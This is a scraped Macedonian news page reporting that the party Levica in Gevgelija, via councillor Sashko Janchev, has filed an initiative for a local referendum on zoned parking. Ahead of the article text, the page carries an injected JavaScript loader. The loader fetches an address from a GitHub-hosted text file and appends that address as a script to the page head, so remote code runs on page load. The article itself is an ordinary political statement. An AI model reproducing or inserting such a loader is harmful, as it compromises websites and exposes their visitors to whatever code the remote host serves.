;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Левица поднесе иницијатива за референдум за зонско паркирање во Гевгелија - Антропол
АктуелноЛокално

Левица поднесе иницијатива за референдум за зонско паркирање во Гевгелија

  • Соопштение на Левица – ЛО Гевгелија

Левица Гевгелија преку својот советник во Советот на Општина Гевгелија, Сашко Јанчев, поднесе иницијатива која има за цел да се распише локален референдум на кој граѓаните од Општина Гевгелија ќе имаат можност директно да одлучат дали сакаат да има зонско паркирање во Гевгелија или не.

Зонското паркирање никаде го нема решено проблемот со недостатокот на паркинг места и сообраќајниот хаос. Но затоа зонското паркирање, како метод, секаде кај што е воведено успешно решава партиски проблеми затоа што овозможува солиден број на партиски вработувања.